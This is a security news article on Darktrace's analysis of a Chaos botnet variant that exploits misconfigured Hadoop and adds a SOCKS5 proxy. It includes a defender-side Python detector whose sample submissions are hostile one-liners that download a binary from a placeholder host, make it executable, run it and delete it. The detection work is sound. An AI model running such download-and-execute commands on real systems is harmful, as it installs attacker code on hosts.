Chaos Botnet Evolves to Exploit Misconfigured Cloud Hadoop with SOCKS Proxy
Security teams should take notice. Researchers at Darktrace said a new Chaos malware variant is now targeting weaknesses such as misconfigured cloud deployments, not just routers and edge devices.
Darktrace discovered the activity in its global honeypot network called CloudyPots. The company said the specific hit came against an intentionally misconfigured Hadoop instance that allowed remote code execution. “Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices,” Darktrace said.
What Chaos is and where it came from
Lumen’s Black Lotus Labs first documented Chaos in September 2022. Lumen described it as a Go-based, cross-platform threat with a long feature set. Lumen found Chaos can run remote shell commands, drop modules, brute-force SSH keys to spread, mine cryptocurrency, and stage DDoS attacks.
According to Lumen, the malware has DDoS tooling for multiple protocols. Those include:
- HTTP
- TLS
- TCP
- UDP
- WebSocket
Darktrace and Lumen both link Chaos to earlier Kaiji code. Lumen noted code overlap that suggests Chaos evolved from Kaiji. Darktrace added that recent samples appear refactored and restructured.
How the Hadoop compromise unfolded
Darktrace said the attack started with an HTTP request to create a new application on the Hadoop service. The application carried a command sequence that downloaded a binary from an attacker’s server, made it executable, ran it, and then removed the file to reduce traces. Darktrace described the sequence as a staged download, permission change, execution, and cleanup.
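As an added illustration, not Darktrace's or Hadoop's own code, here is a defender-side heuristic that scans the commands attached to YARN application submissions for the four-stage download, permission change, execution and cleanup sequence described above. The submission records, paths and URLs are constructed, and the (name, command) record layout is an assumption rather than a real log format.

```python
import re
from typing import Dict, List

# Split a shell command line into its segments (; && || | & newline).
# URLs containing '&' will be split too; acceptable for a heuristic.
SPLIT = re.compile(r"\s*(?:;|&&|\|\||\|(?!\|)|&|\n)\s*")
DOWNLOADERS = {"curl", "wget"}
WRAPPERS = {"nohup", "sh", "bash"}

def analyze(cmd: str) -> Dict[str, object]:
    """Return the stages seen in cmd and whether it matches the chain."""
    stages: List[str] = []
    staged = set()  # paths written by a downloader or made executable
    for seg in (s.strip() for s in SPLIT.split(cmd) if s.strip()):
        tok = seg.split()
        head = tok[0]
        if head in DOWNLOADERS or re.search(r"https?://", seg):
            stage = "download"
            for flag in ("-o", "-O"):  # remember the output path, if any
                if flag in tok and tok.index(flag) + 1 < len(tok):
                    staged.add(tok[tok.index(flag) + 1])
        elif head == "chmod" and len(tok) >= 3:
            stage = "chmod"
            staged.add(tok[-1])
        elif head == "rm":
            stage = "cleanup"
        elif head in staged or (head in WRAPPERS and len(tok) > 1 and tok[1] in staged):
            stage = "execute"  # the fetched or chmod-ed file is run
        else:
            continue
        if stage not in stages:
            stages.append(stage)
    # Download plus execution of the fetched file, with at least one more
    # stage present, is the shape of the Hadoop intrusion described above.
    suspicious = {"download", "execute"} <= set(stages) and len(stages) >= 3
    return {"stages": stages, "suspicious": suspicious}

# Constructed sample submissions: (application name, am-container command).
SAMPLE_SUBMISSIONS = [
    ("wordcount", "hadoop jar wordcount.jar /in /out"),
    ("ingest", "wget https://files.example/data.csv -O /data/in.csv; hadoop fs -put /data/in.csv /in"),
    ("app-1", "curl -o /tmp/x http://payload.example/bin; chmod +x /tmp/x; /tmp/x; rm -f /tmp/x"),
    ("app-2", "wget -q http://payload.example/bin -O /tmp/y && chmod 755 /tmp/y && nohup /tmp/y & rm /tmp/y"),
]

def flagged(submissions=SAMPLE_SUBMISSIONS) -> List[str]:
    """Names of submissions whose command matches the staged chain."""
    return [name for name, cmd in submissions if analyze(cmd)["suspicious"]]

if __name__ == "__main__":
    for name, cmd in SAMPLE_SUBMISSIONS:
        print(name, analyze(cmd))
```

The benign "ingest" job downloads a file but never executes it, so it is reported with a single stage and not flagged; the two staged chains are.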
The domain used to host the payload, pan.tenire[.]com, was previously tied to an email campaign called Operation Silk Lure. Seqrite Labs reported that campaign in October 2025 and linked it to the ValleyRAT remote-access Trojan. Darktrace highlighted the domain reuse while analyzing the Chaos activity.
What changed in the new Chaos sample
Darktrace said the sample it captured is a 64-bit ELF binary that retains core features such as systemd persistence and a keep-alive script stored on disk. The company noted that the developers reworked many functions. Darktrace observed that the routines for SSH spreading and router exploitation appear to have been removed in this build.
Instead, the new build adds a SOCKS proxy feature. Darktrace explained that when the malware receives a StartProxy command from its command and control server, it opens a listener and acts as a SOCKS5 proxy. That lets attackers route traffic through compromised servers and mask the real origin of malicious activity.
Researchers at Darktrace said the proxy capability likely signals a shift toward monetization. The company pointed to other botnets such as Aisuru that moved into offering proxy services to criminals. Darktrace commented that proxy services broaden a botnet operator’s options beyond cryptomining and DDoS.
What defenders should do now
Darktrace warned organizations to harden cloud configurations and patch known CVEs. The vendor emphasized that misconfigured cloud services present a growing attack surface as botnets adapt. “The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial of service is no longer the only risk these botnets pose to organizations and their security teams,” Darktrace said.
Security teams should audit exposed services, enforce least privilege, rotate SSH keys, and apply timely patches. Logging and network segmentation make it harder for attackers to convert a single compromise into a persistent foothold.
As Chaos continues to evolve, attribution remains uncertain. Darktrace noted Chinese-language artifacts and some China-based infrastructure in the samples it analyzed, but the company stopped short of definitive attribution.
#ChaosMalware #CloudSecurity #Botnet #SOCKSProxy #Darktrace #Infosec